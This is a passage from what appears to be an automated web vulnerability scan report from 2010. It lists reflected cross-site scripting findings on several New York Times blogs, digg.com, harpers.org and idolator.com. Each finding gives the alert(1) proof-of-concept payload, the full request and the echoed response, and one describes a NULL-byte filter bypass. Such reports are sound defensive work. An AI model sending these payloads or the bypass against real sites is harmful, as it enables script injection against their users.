Path: |
/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a953"-alert(1)-"fd6c09b8e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/?7a953"-alert(1)-"fd6c09b8e6d=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 74294
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Reviewi ...[SNIP]... imesglobal,nytwheels"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "29_75697"; var s_pagename = "2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/?7a953"-alert(1)-"fd6c09b8e6d=1"; var s_channel = "wheels"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.125. http://dealbook.nytimes.com/2010/11/12/the-acquisition-of-tina-brown/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://dealbook.nytimes.com |
Path: |
/2010/11/12/the-acquisition-of-tina-brown/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9cd7"><script>alert(1)</script>bd807b33336 was submitted in the src parameter. This input was echoed as c9cd7\"><script>alert(1)</script>bd807b33336 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/the-acquisition-of-tina-brown/?src=twrc9cd7"><script>alert(1)</script>bd807b33336 HTTP/1.1 Host: dealbook.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://dealbook.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53617
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... +Kravis+Roberts;Stephen+Schwarzman;Stephen+A.+Schwarzman;Steve+Schwarzman;Blackstone+Group;barry-diller;iacinteractivecorp;media;newsweek;sidney-harman;the-daily-beast;tina-brown;top-headline-2&src=twrc9cd7\"><script>alert(1)</script>bd807b33336"> ...[SNIP]...
|
3.126. http://digg.com/remote-submit [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://digg.com |
Path: |
/remote-submit |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b3e90"><script>alert(1)</script>9fa78c401ad was submitted in the REST URL parameter 1. This input was echoed as b3e90"><script>alert(1)</script>9fa78c401ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /remote-submit%00b3e90"><script>alert(1)</script>9fa78c401ad HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:25 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 Cache-Control: no-cache,no-store,must-revalidate Pragma: no-cache Set-Cookie: traffic_control=1943021764233658561%3A135; expires=Mon, 13-Dec-2010 02:02:25 GMT; path=/; domain=digg.com Set-Cookie: d=aa91bb711c6bbb8366e494de8d7a0a35ee8a25c84136f625861f0473a8a6194c; expires=Thu, 12-Nov-2020 12:10:05 GMT; path=/; domain=.digg.com X-Digg-Time: D=277115 10.2.129.225 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15225
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Digg - error_ - Profile</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="Digg" href="/remote-submit%00b3e90"><script>alert(1)</script>9fa78c401ad.rss"> ...[SNIP]...
|
3.127. http://dinersjournal.blogs.nytimes.com/2010/11/12/using-root-vegetables-raw/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://dinersjournal.blogs.nytimes.com |
Path: |
/2010/11/12/using-root-vegetables-raw/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0f91"><script>alert(1)</script>f1e4b0bb863 was submitted in the src parameter. This input was echoed as f0f91\"><script>alert(1)</script>f1e4b0bb863 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/using-root-vegetables-raw/?src=twrf0f91"><script>alert(1)</script>f1e4b0bb863 HTTP/1.1 Host: dinersjournal.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://dinersjournal.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 74979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... eviews;Cooking;Eating;Wine;Restaurants;Recipes;Dining;Sifton;Bittman;Asimov;New+York;Bruni;The+New+York+Times;beets;brussels-sprouts;butternut-squash;cooking;general;home-cooking;the-minimalist&src=twrf0f91\"><script>alert(1)</script>f1e4b0bb863"> ...[SNIP]...
|
3.128. http://economix.blogs.nytimes.com/2010/11/12/a-high-water-mark-for-profits/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://economix.blogs.nytimes.com |
Path: |
/2010/11/12/a-high-water-mark-for-profits/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce27"><script>alert(1)</script>67611b927bc was submitted in the src parameter. This input was echoed as 3ce27\"><script>alert(1)</script>67611b927bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/a-high-water-mark-for-profits/?src=twr3ce27"><script>alert(1)</script>67611b927bc HTTP/1.1 Host: economix.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://economix.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76894
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... MNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Economics;Economy;Economics+Policy;Economics+Reports;Business;corporate-profits;forecasts;joseph-a-lavorgna;unemployment&src=twr3ce27\"><script>alert(1)</script>67611b927bc"> ...[SNIP]...
|
3.129. http://frugaltraveler.blogs.nytimes.com/2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://frugaltraveler.blogs.nytimes.com |
Path: |
/2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df23"><script>alert(1)</script>267493e97ac was submitted in the src parameter. This input was echoed as 6df23\"><script>alert(1)</script>267493e97ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/?src=mv6df23"><script>alert(1)</script>267493e97ac&ref=travel HTTP/1.1 Host: frugaltraveler.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://frugaltraveler.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65638
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... ft7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Budget+Travel;Discount+Travel;Cheap+Travel;Travel;Travel+Tips;Travel+Advice;jetblue&src=mv6df23\"><script>alert(1)</script>267493e97ac"> ...[SNIP]...
|
3.130. http://frugaltraveler.blogs.nytimes.com/2010/11/02/a-guide-to-the-caribbean-on-a-budget/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://frugaltraveler.blogs.nytimes.com |
Path: |
/2010/11/02/a-guide-to-the-caribbean-on-a-budget/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99fa0"><script>alert(1)</script>3ce9920fcd7 was submitted in the src parameter. This input was echoed as 99fa0\"><script>alert(1)</script>3ce9920fcd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/02/a-guide-to-the-caribbean-on-a-budget/?src=me99fa0"><script>alert(1)</script>3ce9920fcd7&ref=travel HTTP/1.1 Host: frugaltraveler.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://frugaltraveler.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65077
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Budget+Travel;Discount+Travel;Cheap+Travel;Travel;Travel+Tips;Travel+Advice&src=me99fa0\"><script>alert(1)</script>3ce9920fcd7"> ...[SNIP]...
|
3.131. http://frugaltraveler.blogs.nytimes.com/2010/11/10/biking-los-angeles/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://frugaltraveler.blogs.nytimes.com |
Path: |
/2010/11/10/biking-los-angeles/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2ec"><script>alert(1)</script>8d7a351f0ef was submitted in the src parameter. This input was echoed as af2ec\"><script>alert(1)</script>8d7a351f0ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/10/biking-los-angeles/?src=mvaf2ec"><script>alert(1)</script>8d7a351f0ef&ref=travel HTTP/1.1 Host: frugaltraveler.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://frugaltraveler.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56907
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... eft9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Budget+Travel;Discount+Travel;Cheap+Travel;Travel;Travel+Tips;Travel+Advice;biking;los-angeles&src=mvaf2ec\"><script>alert(1)</script>8d7a351f0ef"> ...[SNIP]...
|
3.132. http://gadgetwise.blogs.nytimes.com/2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://gadgetwise.blogs.nytimes.com |
Path: |
/2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0dd9"><script>alert(1)</script>ffceabef99c was submitted in the src parameter. This input was echoed as f0dd9\"><script>alert(1)</script>ffceabef99c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/?src=twrf0dd9"><script>alert(1)</script>ffceabef99c HTTP/1.1 Host: gadgetwise.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://gadgetwise.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 63517
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... w3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Electronics;Gadgets;Personal+Tech;New+Technology;New+Technology+Products;allrecipes;epicurious;ipad;ipad;mobile-tech&src=twrf0dd9\"><script>alert(1)</script>ffceabef99c"> ...[SNIP]...
|
3.133. http://harpers.org/subjects/Sentences [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://harpers.org |
Path: |
/subjects/Sentences |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4564a"><img%20src%3da%20onerror%3dalert(1)>34f47c9c810 was submitted in the REST URL parameter 2. This input was echoed as 4564a"><img src=a onerror=alert(1)>34f47c9c810 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /subjects/Sentences4564a"><img%20src%3da%20onerror%3dalert(1)>34f47c9c810 HTTP/1.1 Host: harpers.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 01:29:36 GMT Server: Apache X-Powered-By: PHP/5.2.6 Cache-Control: max-age=14400 Expires: Sat, 13 Nov 2010 05:29:36 GMT Vary: Accept-Encoding,User-Agent Content-Length: 6802 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-eq ...[SNIP]... <input type="hidden" name="source" value="/subjects/Sentences4564a"><img src=a onerror=alert(1)>34f47c9c810" /> ...[SNIP]...
|
3.134. http://idolator.com/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://idolator.com |
Path: |
/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4566"><script>alert(1)</script>90fff6bafdf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4566\"><script>alert(1)</script>90fff6bafdf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f4566"><script>alert(1)</script>90fff6bafdf=1 HTTP/1.1 Host: idolator.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:04:54 GMT Server: Apache Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=idolator.com X-Powered-By: PHP/5.3.3 Vary: Cookie X-Pingback: http://idolator.com/xmlrpc.php Set-Cookie: PHPSESSID=0fea5498bc1e06749b73cf9da169255d; path=/ Last-Modified: Fri, 12 Nov 2010 18:04:55 -0800 Cache-Control: max-age=300, must-revalidate Keep-Alive: timeout=5, max=1 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 88149
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h ...[SNIP]... <input type="hidden" name="redirect_to" value="http://idolator.com/?f4566\"><script>alert(1)</script>90fff6bafdf=1" /> ...[SNIP]...
|
3.135. http://intransit.blogs.nytimes.com/2010/09/15/show-us-your-city/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://intransit.blogs.nytimes.com |
Path: |
/2010/09/15/show-us-your-city/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c00"><script>alert(1)</script>03798aac80c was submitted in the src parameter. This input was echoed as d9c00\"><script>alert(1)</script>03798aac80c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/09/15/show-us-your-city/?src=mvd9c00"><script>alert(1)</script>03798aac80c&ref=travel HTTP/1.1 Host: intransit.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:05:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 59592
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... ft7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;show-us-your-city;video&src=mvd9c00\"><script>alert(1)</script>03798aac80c"> ...[SNIP]...
|
3.136. http://intransit.blogs.nytimes.com/2010/11/11/prague-art-show-embraces-decadence/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://intransit.blogs.nytimes.com |
Path: |
/2010/11/11/prague-art-show-embraces-decadence/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b807"><script>alert(1)</script>1aa3eacb6c4 was submitted in the src parameter. This input was echoed as 7b807\"><script>alert(1)</script>1aa3eacb6c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/11/prague-art-show-embraces-decadence/?src=mv7b807"><script>alert(1)</script>1aa3eacb6c4&ref=travel HTTP/1.1 Host: intransit.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:05:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 58574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... 8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;art;globespotters;prague;prague&src=mv7b807\"><script>alert(1)</script>1aa3eacb6c4"> ...[SNIP]...
|
3.137. http://intransit.blogs.nytimes.com/2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://intransit.blogs.nytimes.com |
Path: |
/2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93df7"><script>alert(1)</script>78bd648be4f was submitted in the src parameter. This input was echoed as 93df7\"><script>alert(1)</script>78bd648be4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/?src=me93df7"><script>alert(1)</script>78bd648be4f&ref=travel HTTP/1.1 Host: intransit.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:05:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 56967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... 5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;q-a;siem-reap&src=me93df7\"><script>alert(1)</script>78bd648be4f"> ...[SNIP]...
|
3.138. http://intransit.blogs.nytimes.com/2010/11/12/japans-high-speed-trains-lines-expand/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://intransit.blogs.nytimes.com |
Path: |
/2010/11/12/japans-high-speed-trains-lines-expand/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff1af"><script>alert(1)</script>c890c53b0a0 was submitted in the src parameter. This input was echoed as ff1af\"><script>alert(1)</script>c890c53b0a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/japans-high-speed-trains-lines-expand/?src=mvff1af"><script>alert(1)</script>c890c53b0a0&ref=travel HTTP/1.1 Host: intransit.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:05:09 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 52981
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... ft3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.&src=mvff1af\"><script>alert(1)</script>c890c53b0a0"> ...[SNIP]...
|
3.139. http://intransit.blogs.nytimes.com/2010/11/12/paris-photo-fair-covers-the-spectrum/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://intransit.blogs.nytimes.com |
Path: |
/2010/11/12/paris-photo-fair-covers-the-spectrum/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8307"><script>alert(1)</script>b0e62f7972a was submitted in the src parameter. This input was echoed as f8307\"><script>alert(1)</script>b0e62f7972a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/paris-photo-fair-covers-the-spectrum/?src=mef8307"><script>alert(1)</script>b0e62f7972a&ref=travel HTTP/1.1 Host: intransit.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:05:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 56822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... MNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;festivals;globespotters;paris;paris;photography&src=mef8307\"><script>alert(1)</script>b0e62f7972a"> ...[SNIP]...
|
3.140. http://intransit.blogs.nytimes.com/2010/11/12/sunday-preview-66/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://intransit.blogs.nytimes.com |
Path: |
/2010/11/12/sunday-preview-66/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db75"><script>alert(1)</script>d8711375637 was submitted in the src parameter. This input was echoed as 6db75\"><script>alert(1)</script>d8711375637 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/sunday-preview-66/?src=twr6db75"><script>alert(1)</script>d8711375637 HTTP/1.1 Host: intransit.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:04:59 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 52105
